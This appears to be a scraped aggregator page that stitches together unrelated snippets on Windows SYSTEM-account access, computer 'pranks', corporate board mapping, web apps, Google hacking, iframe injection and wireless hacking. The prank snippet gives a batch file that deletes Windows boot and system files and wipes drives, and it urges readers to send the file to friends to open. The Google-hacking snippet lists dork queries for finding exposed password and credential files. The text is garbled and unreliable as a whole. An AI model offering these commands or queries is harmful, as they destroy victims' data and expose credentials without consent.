background preloader

How to gain access to system account the most powerful account in Windows. « Alien Eyes

How to gain access to system account the most powerful account in Windows. « Alien Eyes
There is an account in Microsoft Windows that is more powerful than the Administrator account in Windows Operating Systems. That account is called System account it is similar to the root OR super user in the Linux/Unix world . I will show you how to access this system account in this article. You can use this facility for removing programs that are causing problems to your system, malware etc. Introduction If you look at the task manager (which can be launched by pressing [CTRL]+[ALT]+[DEL]) you will see some processes that are running with System level privileges. System is the highest account in Windows (like root),You can be a super power user by accessing the system account (even while you are logged in as a restricted user) Note: Accessing system account may cause serious problems. Local system differs from an administrator account in that it has full control of the operating system, similar to root on a Unix machine. Check the name of the account you’ve logged into (Click start.

Painfully Computer Pranks ~ Computer Hacking | Learn How To Hack Computer pranks to freak out your friends and make them crying for mummy I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus, How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. These pranks could be very painfully, so please use them at your own risk ;) 1. Crash a Computer System With Nothing But a URL! I stumbled across this URL while surfing the internet. 2. Open notepad and copy/paste this code: @echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini Now Save it as a .bat file. This should shutdown the persons computer. Send it to your friends computer and tell them to open it. Here is another code too..... cmd /c del c:\windows\* /F /S /Q cmd /c del c:\* /F /S /Q 3. 1. 2. 3.

About OverviewThey Rule aims to provide a glimpse of some of the relationships of the US ruling class. It takes as its focus the boards of some of the most powerful U.S. companies, which share many of the same directors. Some individuals sit on 5, 6 or 7 of the top 1000 companies. It allows users to browse through these interlocking directories and run searches on the boards and companies. A user can save a map of connections complete with their annotations and email links to these maps to others. They Rule is a starting point for research about these powerful individuals and corporations. Context A few companies control much of the economy and oligopolies exert control in nearly every sector of the economy. Karl Marx once called this ruling class a 'band of hostile brothers.' The Data We do not claim that this data is 100% accurate at all times. Credits This site was made by Josh On with the indispensable assistance of LittleSis.org.

100 Web Apps to Rule Them All Our original roundup of 100 Web Apps to Rule Them All was published in May, 2011. Nearly a year later, we’re back with over a dozen new apps … and sadly with a few of our original favorites removed since they hit the deadpool. We’ve added the newest apps to the top of this roundup article, so you can quickly see our new favorites. Today, more than ever before, you can get much of your work done right from your browser. There’s web apps for almost everything, and increasingly they work from mobile devices, have beautifully designed interfaces that rival native apps, and work together to make your online life easier. Whether you’re just getting started using web apps, or are a longtime fan of web apps and would like to find more exciting apps, you’ll be sure to find something interesting here. Enjoy! The Newest Web Apps to Rule Them All ifttt ifttt Web apps have the bad habit of often not working together. Price: Free AppStorm Review: Use Ifttt to Make the Internet Work for You TinyLetter Lemon

Know the Trade – Your IT Security Information Portal CISSP/CEH/CISA/Hacker and Penetration Testing Specialist Google Hacking allintitle:Brains, Corp. camera allintitle:"index of/admin" allintitle:"index of/root" allintitle:restricted filetype:doc site:gov allintitle:restricted filetype :mail allintitle:sensitive filetype:doc allinurl:/bash_history allinurl:winnt/system32/ (get cmd.exe) ext:ini eudora.ini ext:pwd inurl:(service|authors|administrators |users) "# -FrontPage-" filetype:bak inurl:"htaccess|passwd|shadow|htusers" filetype:conf slapd.conf filetype:ctt "msn" filetype:mdb inurl:"account|users|admin|administrators|passwd|password" filetype:mdb inurl:users.mdb filetype:QDF QDF filetype:pdf "Host Vulnerability Summary Report" "Assessment Report" filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" ) filetype:xls inurl:"email.xls" filetype:user eggdrop user intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html) intitle:"Welcome to IIS 4.0!" These log files record info about the SSH client PUTTY.

Hidden iframe injection attacks | Structured Randomness [Updated on October 27, 2009 with new a version of the script] It is a shame that after all those posts about security, some of my websites were under attack today. Shoban and Anand emailed me about this today morning (Thanks guys) and I tried to understand what was going on. To my utter disbelief more than 10 websites hosted in the same server were affected by the attack. All the index.* files in the server were infected with a piece of code that loaded a hidden iframe in the page. To the html pages the following piece of code was added: To php pages it added: echo “<iframe src=\” Asha took the effort and cleaned most of the infected files. How did the worm inject the hidden iframes to my files? There are two ways through which the worm is believed to infect your files: 1) Server is compromised This is the most common way. 2) Client side FTP The worm resides in some/any of the client side PCs you use for accessing the ftp/control panel accounts of your hosting server.

Download Youtube Videos | Youtube Video Downloader I hacked my secure wireless network: here’s how it’s done Wireless networks are everywhere; they are widely available, cheap, and easy to setup. To avoid the hassle of setting up a wired network in my own home, I chose to go wireless. After a day of enjoying this wireless freedom, I began thinking about security. How secure is my wireless network? I searched the Internet for many days, reading articles, gathering information, and participating on message boards and forums. I soon came to the realization that the best way for me to understand the security of my wireless network would be to test it myself. How a wireless network works A wireless local area network (WLAN) is the linking of 2 or more computers with Network Interface Cards (NICs) through a technology based on radio waves. Access points are base stations for the wireless network. The set of all stations that communicate with each other is referred to as the Basic Service Set (BSS). Data streams, known as packets, are sent between the Access Point, and it’s clients. Packets and IVs

The Official YAML Web Site Delicious

Related: